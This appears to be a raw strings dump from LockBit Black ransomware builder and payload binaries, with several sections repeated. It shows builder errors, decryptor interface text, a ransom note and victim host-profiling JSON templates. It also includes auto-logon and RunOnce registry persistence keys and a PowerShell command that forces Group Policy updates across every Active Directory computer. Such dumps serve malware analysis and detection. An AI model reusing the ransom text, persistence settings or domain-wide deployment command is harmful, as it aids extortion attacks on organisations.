[ERROR]
Password_dll.txt
Encryptor Creation Error [BuildDll #2]
[ERROR]
Encryptor Creation Error [BuildDll #3]
[ERROR]
Config File Error
[ERROR]
Public Key File Error
[ERROR]
Public Key File Size Error
[ERROR]
Error Allocate KeyHexBuf
[ERROR]
Error Allocate KeyAndConfBuf
[ERROR]
Error Allocate WorkMem
[ERROR]
Resource Compression Error
[ERROR]
Resource Not Found
[ERROR]
Error Allocate ExeBuf
[ERROR]
Encryptor Creation Error [BuildRef]
[ERROR]
Config File Error
[ERROR]
Public Key File Error
[ERROR]
Public Key File Size Error
[ERROR]
Error Allocate KeyHexBuf
[ERROR]
Error Allocate KeyAndConfBuf
[ERROR]
Error Allocate WorkMem
[ERROR]
Resource Compression Error
[ERROR]
Resource Not Found
[ERROR]
Error Allocate ExeBuf
[ERROR]
Encryptor Creation Error [BuildExe #1]
[ERROR]
Password_exe.txt
Encryptor Creation Error [BuildExe #2]
[ERROR]
Encryptor Creation Error [BuildExe #3]
[ERROR]
Public Key File Error
[ERROR]
Public Key File Size Error
[ERROR]
Error Allocate RsaKey Buffer
[ERROR]
Public Key File Size Error
[ERROR]
Config File Error
[ERROR]
Error Allocate RsaKey Buffer
[ERROR]
Resource Not Found
[ERROR]
Error Allocate ExeBuf
[ERROR]
Decryptor Creation Error
[ERROR]
-config
-pubkey
-ofile
-config
-privkey
-ofile
NTUSER.DAT
true|%s|%s
file empty
file not found
file not encrypted or damaged
file rsa key not valid
false|%s|%s
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
%s.README.txt
\DefaultIcon
advapi32.dll
WControl Panel\Desktop
WallPaper
LockBit Black Decryptor
Finding Files In Progress...
Wait...
Found %u File(s)
Found %u File(s)
Decrypting Files In Progress...
Wait...
Decrypted %u File(s)
Decrypted %u File(s)
Decrypting Finished
Press Any Key To Exit...
trial_dec.log
LockBit Black Decryptor
Decrypt All Encrypted Files
user32
Network Connection Unavailable
[ERROR]
Finding Files In Progress...
Decrypting File In Progress...
Decrypting Files In Progress...
Decrypt All Encrypted Files
Decrypt All Encrypted Files
Finding Files In Progress...
ntdll.dll
IDD_DLG
Tahoma
IDC_BTN
All Encrypted Files
All Decrypted Files
((((( H
LockBit Black
All your important files are stolen and encrypted!
You must find %s file
and follow the instruction!
LockBit Black
All your important files are stolen and encrypted!
You must find %s file
and follow the instruction!
"host_hostname":"%s",
"host_user":"%s",
"host_os":"%s",
"host_domain":"%s",
"host_arch":"%s",
"host_lang":"%s",
"disk_name":"%s",
"disk_size":"%u",
"free_size":"%u"
"disks_info":[
Mozilla/5.0 (Windows NT 6.1)
AppleWebKit/587.38 (KHTML, like Gecko)
Chrome/91.0.4472.77
Safari/537.36
Edge/91.0.864.37
Firefox/89.0
Gecko/20100101
Accept: */*
Connection: keep-alive
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain
SOFTWARE\Policies\Microsoft\Windows\OOBE
DisablePrivacyExperience
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
AutoAdminLogon
DefaultUserName
DefaultDomainName
DefaultPassword
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
%s -pass %s
powershell Get-ADComputer -filter * -Searchbase '%s' | Foreach-Object { Invoke-GPUpdate -computer $_.name -force -RandomDelayInMinutes 0}
[{00000000-0000-0000-0000-000000000000}{3BAE7E51-E3F4-41D0-853D-9BB9FD47605F}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}][{7150F9BF-48AD-4DA4-A49C-29EF4A8369BA}{3BAE7E51-E3F4-41D0-853D-9BB9FD47605F}][{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]
[{00000000-0000-0000-0000-000000000000}{BFCBBEB0-9DF4-4C0C-A728-434EA66A0373}{CC5746A9-9B74-4BE5-AE2E-64379C86E0E4}][{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{6A4C88C6-C502-4F74-8F60-2CB23EDC24E2}{BFCBBEB0-9DF4-4C0C-A728-434EA66A0373}][{91FBB303-0CD5-4055-BF42-E512A681B325}{CC5746A9-9B74-4BE5-AE2E-64379C86E0E4}]
((((( H
LockBit Black
All your important files are stolen and encrypted!
You must find %s file
and follow the instruction!
LockBit Black
All your important files are stolen and encrypted!
You must find %s file
and follow the instruction!
"host_hostname":"%s",
"host_user":"%s",
"host_os":"%s",
"host_domain":"%s",
"host_arch":"%s",
"host_lang":"%s",
"disk_name":"%s",
"disk_size":"%u",
"free_size":"%u"
"disks_info":[
Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/91.0.4472.77
Safari/537.36
Edge/91.0.864.37
Firefox/89.0
Gecko/20100101
Accept: */*
Connection: keep-alive
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
AutoAdminLogon
DefaultUserName
DefaultDomainName
DefaultPassword
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Policies\Microsoft\Windows\OOBE
DisablePrivacyExperience
powershell Get-ADComputer -filter * -Searchbase '%s' | Foreach-Object { Invoke-GPUpdate -computer $_.name -force -RandomDelayInMinutes 0}
[{00000000-0000-0000-0000-000000000000}{3BAE7E51-E3F4-41D0-853D-9BB9FD47605F}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}][{7150F9BF-48AD-4DA4-A49C-29EF4A8369BA}{3BAE7E51-E3F4-41D0-853D-9BB9FD47605F}][{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]
[{00000000-0000-0000-0000-000000000000}{BFCBBEB0-9DF4-4C0C-A728-434EA66A0373}{CC5746A9-9B74-4BE5-AE2E-64379C86E0E4}][{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{6A4C88C6-C502-4F74-8F60-2CB23EDC24E2}{BFCBBEB0-9DF4-4C0C-A728-434EA66A0373}][{91FBB303-0CD5-4055-BF42-E512A681B325}{CC5746A9-9B74-4BE5-AE2E-64379C86E0E4}]
((((( H
LockBit Black
All your important files are stolen and encrypted!
You must find %s file
and follow the instruction!
LockBit Black
All your important files are stolen and encrypted!
You must find %s file
and follow the instruction!
"host_hostname":"%s",
"host_user":"%s",
"host_os":"%s",
"host_domain":"%s",
"host_arch":"%s",
"host_lang":"%s",
"disk_name":"%s",
"disk_size":"%u",
"free_size":"%u"
"disks_info":[
Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/91.0.4472.77
Safari/537.36
Edge/91.0.864.37
Firefox/89.0
Gecko/20100101
Accept: */*
Connection: keep-alive
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain